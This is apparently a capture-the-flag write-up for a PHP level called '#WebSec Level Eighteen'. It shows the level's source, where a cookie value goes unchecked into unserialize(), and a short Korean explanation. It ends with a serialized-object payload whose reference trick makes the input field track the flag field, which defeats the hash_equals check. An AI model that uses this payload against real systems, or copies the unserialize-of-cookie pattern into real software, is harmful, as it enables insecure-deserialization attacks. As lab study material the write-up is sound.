source.php


<?php
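// flag.php is not shown on this page; presumably it defines $flag, which the
// template further down reads.
include "flag.php";

// Seed or refresh the 'obj' cookie that the page later passes to unserialize().
// NOTE(review): the cookie carries no integrity protection (no HMAC or
// signature), so the server cannot tell a value it issued from one the client
// wrote. Everything read back from it must be treated as untrusted input.
if (isset($_POST['obj'])) {
    // A posted value is copied into the cookie verbatim, without validation.
    setcookie('obj', $_POST['obj']);
} elseif (!isset($_COOKIE['obj'])) {
    // First visit: issue a default object holding a single 'input' field.
    $obj = new stdClass;
    $obj->input = 1234;
    setcookie('obj', serialize($obj));
}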
?>
<!DOCTYPE html>
<html>
<head>
        <title>#WebSec Level Eighteen</title>
        <link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
        <body>
                <div id="main">
                        <div class="container">
                                <div class="row">
                                        <h1>Level Eighteen <small> - json_decode is for the weak</small></h1>
                                </div>
                                <div class="row">
                                        <p class="lead">
                                        Let's pretend that we gave you a serialized object before ; can you give it back please?<br>
                    This fine level was created by <mark>nurfed</mark>.
                                        You can check the sources <a href="source.php">here</a>.
                                        </p>
                                </div>
                        </div>
                        <div class="container">
                            <div class="row">
                                <form class="form-inline" method='post'>
                                    <input name='flag' class='form-control' type='text' placeholder='Guessed flag'>
                                    <input class="form-control btn btn-default" name="submit" value='Go' type='submit'>
                                </form>
                            </div>
                        </div>
                        <?php if (isset ($_COOKIE['obj'])): ?>
                        <br>
                        <div class="container">
                            <div class="row">
                                <?php
                                    $obj 
$_COOKIE['obj'];
                                    
$unserialized_obj unserialize ($obj);
                                    
$unserialized_obj->flag $flag;  
                                    if (
hash_equals ($unserialized_obj->input$unserialized_obj->flag))
                                        echo 
'<div class="alert alert-success">Here is your flag: <mark>' $flag '</mark>.</div>';   
                                    else 
                                        echo 
'<div class="alert alert-danger"><code>' htmlentities($obj) . '</code> is an invalid object, sorry.</div>';
                                
?>
                            </div>
                        </div>
                        <?php endif ?>
                </div>
        </body>
</html>


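unserialize된 객체의 input 필드 값이, unserialize 이후에 덮어써지는 flag 필드 값과 일치하면 된다. input을 flag 필드에 대한 레퍼런스로 설정한 serialize 데이터를 만들어서 보내주면 된다. 이렇게 하면 서버가 flag 필드에 실제 값을 대입하는 순간 input도 같은 값을 가리키게 되므로, hash_equals 비교는 결국 같은 값끼리의 비교가 되어 항상 통과한다.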


payload


O:8:"stdClass":2:{s:4:"flag";s:3:"123";s:5:"input";R:2;}
